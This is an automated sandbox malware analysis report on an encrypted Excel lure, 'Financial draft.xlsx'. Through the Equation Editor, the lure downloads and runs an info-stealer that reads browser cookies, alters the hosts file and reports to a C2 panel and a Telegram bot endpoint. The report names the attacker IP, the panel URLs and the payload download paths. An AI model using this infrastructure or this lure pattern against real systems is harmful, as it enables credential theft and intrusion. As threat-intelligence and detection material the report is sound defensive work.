                            http://192.210.214.146RegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000002.2391676087.00000000029CC000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://o0VOknSTi6os4KGPlT.netRegAsm.exe, 00000005.00000002.2391709320.0000000002A02000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.%s.comPARegAsm.exe, 00000005.00000002.2391007189.0000000002410000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            low
                            http://ns.avbc.exe, 00000004.00000003.2185595701.0000000004C54000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000005.00000002.2391633651.00000000029A0000.00000004.00000001.sdmpfalse
                              high
                              http://192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php127.0.0.1POSTRegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------xRegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                                high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000004.00000002.2190934817.00000000006CE000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2390402353.0000000000402000.00000040.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://cNhFXD.comRegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.ipify.orgGETMozilla/5.0RegAsm.exe, 00000005.00000002.2391551798.0000000002911000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                192.210.214.146
                                unknownUnited States
                                36352AS-COLOCROSSINGUStrue

                                General Information

                                Joe Sandbox Version:31.0.0 Red Diamond
                                Analysis ID:321109
                                Start date:20.11.2020
                                Start time:11:15:35
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 7m 12s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:Financial draft.xlsx
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:6
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.adwa.spyw.expl.evad.winXLSX@6/6@0/1
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 42.2% (good quality ratio 23.5%)
                                • Quality average: 30.6%
                                • Quality standard deviation: 33.2%
                                HCA Information:
                                • Successful, ratio: 98%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .xlsx
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • TCP Packets have been reduced to 100
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                11:17:18API Interceptor78x Sleep call for process: EQNEDT32.EXE modified
                                11:17:21API Interceptor30x Sleep call for process: vbc.exe modified
                                11:17:27API Interceptor800x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                192.210.214.146y5y4LzZPCE.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy2/inc/3321836fba4ddd.php
                                8pSlNVws0a.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php
                                PaymentNOV+2020.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/file.exe
                                Finance Draft COO.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php
                                6266715850.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/new.exe
                                LXh2EvHi2Q.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy2/inc/3321836fba4ddd.php
                                PSR002330 - DURSTONE CADE S L.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/major.exe
                                pv7yALDU1F.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php
                                baQriS38Rn.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy2/inc/3321836fba4ddd.php
                                SecuriteInfo.com.Trojan.PWS.Stealer.24943.32088.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy1/inc/8d7b442291cce3.php
                                SecuriteInfo.com.Trojan.PWS.Maria.4.24905.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-majorboy2/inc/3321836fba4ddd.php
                                SecuriteInfo.com.BehavesLike.Win32.Generic.jc.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-major/inc/fdf5a7bec7bd14.php
                                P.O-003448hk.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-major/inc/fdf5a7bec7bd14.php
                                BANK INFO.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-major/inc/fdf5a7bec7bd14.php
                                mZmZQnSKjd.exeGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-major/inc/fdf5a7bec7bd14.php
                                Payment INV.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146/webpanel-major/inc/fdf5a7bec7bd14.php

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AS-COLOCROSSINGUSRFQ_SMKM19112020.xlsxGet hashmaliciousBrowse
                                • 198.23.212.152
                                Payment_Confirmation_Slip.xlsxGet hashmaliciousBrowse
                                • 198.23.212.152
                                Order List.xlsxGet hashmaliciousBrowse
                                • 198.23.213.57
                                PI_SMK18112020.xlsxGet hashmaliciousBrowse
                                • 198.23.212.152
                                y5y4LzZPCE.exeGet hashmaliciousBrowse
                                • 192.210.214.146
                                8pSlNVws0a.exeGet hashmaliciousBrowse
                                • 192.210.214.146
                                PaymentNOV+2020.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146
                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                • 198.23.213.236
                                Finance Draft COO.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146
                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                • 198.23.213.236
                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                • 198.23.213.236
                                https://techmusicdocs.ml/cgi/wnw/f14bd18100fd55fbd62a16f226e272e2/L001L001.htmGet hashmaliciousBrowse
                                • 198.23.213.236
                                ShippingDoc.jarGet hashmaliciousBrowse
                                • 198.46.141.66
                                baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                • 198.46.134.245
                                https://bremen.com.ve/TDS/ofc1Get hashmaliciousBrowse
                                • 192.210.150.19
                                Order List.xlsxGet hashmaliciousBrowse
                                • 75.127.1.225
                                PO-4806125050.xlsxGet hashmaliciousBrowse
                                • 198.23.213.57
                                6266715850.xlsxGet hashmaliciousBrowse
                                • 192.210.214.146
                                Commercial Invoice New.xlsxGet hashmaliciousBrowse
                                • 198.23.212.166
                                Inquiry_16-11.xlsxGet hashmaliciousBrowse
                                • 75.127.1.225

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):590848
                                Entropy (8bit):7.863719909911447
                                Encrypted:false
                                SSDEEP:12288:OR1bC2wpJYF6xNxbFhAL9xpaUHfAkTxKLlmRR6tvk+T:gXSX7mpaUHYeKBW4tvk
                                MD5:120A53A6B152CF6CED8ED708B2F2A033
                                SHA1:1287D517650EE77A1FEECAD3D44211E8BB9583C9
                                SHA-256:5825A5314C16572842EFBBD60BE63080616693D2AEE66A379F70C54C09E2EE94
                                SHA-512:C19E58F812DD63844D68ACDD0721E9CEAEADE70E28925C0E9850CE37BA5F656ACF1F37F23A0FCDA8ADB4E23AAFAF69D44D9446AA05546D18010E48B462D9D6D7
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Metadefender, Detection: 35%, Browse
                                • Antivirus: ReversingLabs, Detection: 62%
                                Reputation:low
                                IE Cache URL:http://192.210.214.146/new.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._............................>.... ... ....@.. .......................`......4B....@.....................................W.... ..N....................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...N.... ......................@..@.reloc.......@......................@..B................ .......H............e...........<...s..........................................6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r'..p.....*..{%...*..{&...*..{'...*r.(......}%.....}&.....}'...*..{5...*..{6...*V.(......}5.....}6...*. ...N )UU.Z()....{5...o/...X )UU.Z(+....{6...o0...X*J.s<....sB...o2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*
                                C:\Users\user\AppData\Roaming\bjkher0q.t03\Chrome\Default\Cookies
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                Category:dropped
                                Size (bytes):28672
                                Entropy (8bit):0.9650411582864293
                                Encrypted:false
                                SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                MD5:903C35B27A5774A639A90D5332EEF8E0
                                SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\bjkher0q.t03\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:SQLite 3.x database, user version 7, last written using SQLite version 3017000
                                Category:modified
                                Size (bytes):524288
                                Entropy (8bit):0.08107860342777487
                                Encrypted:false
                                SSDEEP:48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
                                MD5:1138F6578C48F43C5597EE203AFF5B27
                                SHA1:9B55D0A511E7348E507D818B93F1C99986D33E7B
                                SHA-256:EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
                                SHA-512:6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\Desktop\~$Financial draft.xlsx
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):1.4377382811115937
                                Encrypted:false
                                SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                MD5:96114D75E30EBD26B572C1FC83D1D02E
                                SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                C:\Users\Public\vbc.exe
                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):590848
                                Entropy (8bit):7.863719909911447
                                Encrypted:false
                                SSDEEP:12288:OR1bC2wpJYF6xNxbFhAL9xpaUHfAkTxKLlmRR6tvk+T:gXSX7mpaUHYeKBW4tvk
                                MD5:120A53A6B152CF6CED8ED708B2F2A033
                                SHA1:1287D517650EE77A1FEECAD3D44211E8BB9583C9
                                SHA-256:5825A5314C16572842EFBBD60BE63080616693D2AEE66A379F70C54C09E2EE94
                                SHA-512:C19E58F812DD63844D68ACDD0721E9CEAEADE70E28925C0E9850CE37BA5F656ACF1F37F23A0FCDA8ADB4E23AAFAF69D44D9446AA05546D18010E48B462D9D6D7
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: Metadefender, Detection: 35%, Browse
                                • Antivirus: ReversingLabs, Detection: 62%
                                Reputation:low
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._............................>.... ... ....@.. .......................`......4B....@.....................................W.... ..N....................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...N.... ......................@..@.reloc.......@......................@..B................ .......H............e...........<...s..........................................6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r'..p.....*..{%...*..{&...*..{'...*r.(......}%.....}&.....}'...*..{5...*..{6...*V.(......}5.....}6...*. ...N )UU.Z()....{5...o/...X )UU.Z(+....{6...o0...X*J.s<....sB...o2...*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*
                                C:\Windows\System32\drivers\etc\hosts
                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):11
                                Entropy (8bit):2.663532754804255
                                Encrypted:false
                                SSDEEP:3:iLE:iLE
                                MD5:B24D295C1F84ECBFB566103374FB91C5
                                SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview: ..127.0.0.1

                                Static File Info

                                General

                                File type:CDFV2 Encrypted
                                Entropy (8bit):7.996587080305421
                                TrID:
                                • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                File name:Financial draft.xlsx
                                File size:2355200
                                MD5:ab27f33e05cefb65852553e146ab64d3
                                SHA1:84be9c788eb8738937a1cfaae79bf72e0574c20b
                                SHA256:66daf72a5b7e2e88cdcecc5c19010fd7ad61d24f70792b5d8d7b719a08a6de68
                                SHA512:998d4420823e97341bd34a1cea5047fecd9bad6de6245377f9ddc7e1be4365de596d6872156f38bec7781d465663cbbf15ed7f571a6f610371043e637f9c8d7f
                                SSDEEP:49152:6NCn3257lQb89DzyvgGXyRJimgyGboZGM2n9ElO1TGj:6QGJlQMfy4pRJJhDZ72alO1Kj
                                File Content Preview:........................>...................$...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                                File Icon

                                Icon Hash:e4e2aa8aa4b4bcb4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "Financial draft.xlsx"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:True
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:False
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:False

                                Streams

                                Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                General
                                Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                File Type:data
                                Stream Size:64
                                Entropy:2.73637206947
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                General
                                Stream Path:\x6DataSpaces/DataSpaceMap
                                File Type:data
                                Stream Size:112
                                Entropy:2.7597816111
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                General
                                Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                File Type:data
                                Stream Size:200
                                Entropy:3.13335930328
                                Base64 Encoded:False
                                Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                General
                                Stream Path:\x6DataSpaces/Version
                                File Type:data
                                Stream Size:76
                                Entropy:2.79079600998
                                Base64 Encoded:False
                                Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                Stream Path: EncryptedPackage, File Type: data, Stream Size: 2332808
                                General
                                Stream Path:EncryptedPackage
                                File Type:data
                                Stream Size:2332808
                                Entropy:7.99990883648
                                Base64 Encoded:True
                                Data ASCII:q . # . . . . . a . . - . . . . . . Y . . . a . 0 . . . . . . Q . n . % . . . i + . z 3 . . . . U p 9 . 1 . . . F . . 6 . R . . M 4 . 7 . . . ` . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F p 0 . p . . 5 . . . . J . . F F
                                Data Raw:71 98 23 00 00 00 00 00 61 e5 ec 2d c6 1e 98 b7 82 be 59 ae 0f 99 61 9d 30 bf a9 eb 02 0b 17 51 e4 6e 90 25 ac f3 8f 69 2b b8 7a 33 a6 04 1a d6 55 70 39 af 31 a8 d6 b1 46 8e e3 36 f5 52 8b a8 4d 34 e7 37 f1 d5 b3 60 d0 1f f6 4a 15 ec 46 46 70 30 2e 70 cb 00 35 dc d0 1f f6 4a 15 ec 46 46 70 30 2e 70 cb 00 35 dc d0 1f f6 4a 15 ec 46 46 70 30 2e 70 cb 00 35 dc d0 1f f6 4a 15 ec 46 46
                                Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                General
                                Stream Path:EncryptionInfo
                                File Type:data
                                Stream Size:224
                                Entropy:4.49684362715
                                Base64 Encoded:False
                                Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . w . . . . . . \\ . ` . . x 2 . . . . . . . ? . u . . . . . . . . . Y . . . . . . 1 e . t . . . . . . . * E $ . . . G 0 . . s .
                                Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                Network Behavior

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 20, 2020 11:17:07.334868908 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.482208014 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.482280970 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.482589960 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.635740995 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.635791063 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.635812998 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.635839939 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.636080027 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.783135891 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783181906 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783202887 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783226967 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783253908 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783279896 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783303022 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783325911 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.783335924 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.783359051 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.783381939 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.930031061 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930072069 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930088997 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930107117 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930124044 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930147886 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930171013 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930196047 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930218935 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930241108 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930263042 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930284977 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930305958 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930329084 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930346966 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930358887 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.930370092 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:07.930389881 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.930393934 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.930409908 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:07.933506012 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077234983 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077265978 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077291965 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077301025 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077316046 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077316999 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077336073 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077342987 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077352047 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077367067 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077398062 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077403069 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077403069 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077420950 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077438116 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077445984 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077455044 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077462912 CET4916780192.168.2.22192.210.214.146
                                Nov 20, 2020 11:17:08.077472925 CET8049167192.210.214.146192.168.2.22
                                Nov 20, 2020 11:17:08.077480078 CET4916780192.168.2.22192.210.214.146
